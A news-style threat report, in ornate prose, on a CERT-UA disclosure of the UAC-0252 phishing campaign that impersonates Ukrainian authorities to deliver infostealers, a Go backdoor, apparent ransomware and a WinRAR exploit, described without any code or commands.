In early 2026, malicious actors initiated a mass dissemination of emails masquerading as official communications from Ukrainian state authorities. Recipients are deceptively urged to “update mobile applications” pertinent to ubiquitous civilian and military services. Lurking beneath the veneer of these missives is a pernicious campaign that deploys a formidable arsenal of software designed to exfiltrate data and establish remote dominion over compromised computers.
This nascent wave of hostile activity was disclosed by the State Service of Special Communications and Information Protection of Ukraine, operating through its premier cyber incident response vanguard, CERT-UA. The threat syndicate has been officially christened with the identifier UAC-0252. Since January 2026, cybersecurity sentinels have intercepted a deluge of correspondence ostensibly originating from central executive bodies and regional administrative echelons.
These deceptive epistles harbor either an archive containing an executable payload or a hyperlink tethered to a compromised domain. In the latter scenario, the link directs the quarry to a legitimate website grievously afflicted by a cross-site scripting vulnerability. Upon traversal, the webpage invariably triggers a venomous JavaScript routine, which subsequently downloads the executable file onto the host machine. The malefactors have audaciously sequestered a portion of these malicious files and scripts within the GitHub platform, meticulously camouflaging them as innocuous, mundane projects.
This orchestrated assault leverages a pantheon of malevolent software. Prominent among these are the SHADOWSNIFF and SALATSTEALER infostealers, purposed with the ruthless plundering of credentials and other highly classified intelligence. Furthermore, investigators have detected the presence of DEAFTICK, a rudimentary backdoor architected in the Go programming language. This formidable amalgamation empowers the assailants to seamlessly infiltrate the besieged system and comprehensively harvest the user’s sensitive data.
During a meticulous reconnaissance of the hostile infrastructure, experts unearthed yet another suspicious instrument secreted within a GitHub repository. This artifact exhibits the unmistakable hallmarks of cryptographic ransomware, bearing the internal nomenclature “AVANGARD ULTIMATE v6.0.” Co-located within this digital cache was an archive harboring an exploit designed to weaponize a vulnerability within the WinRAR utility (CVE-2025-8088), unequivocally indicating the adversaries’ relentless pursuit of multifarious vectors for systemic penetration.
A rigorous forensic analysis of the deployed armaments and underlying infrastructure has irrevocably tethered this campaign to the orchestrators who disseminate materials via the PalachPro Telegram channel. The vanguard at CERT-UA remains steadfast in its vigil, relentlessly tracking the machinations of the syndicate operating under the UAC-0252 designation.
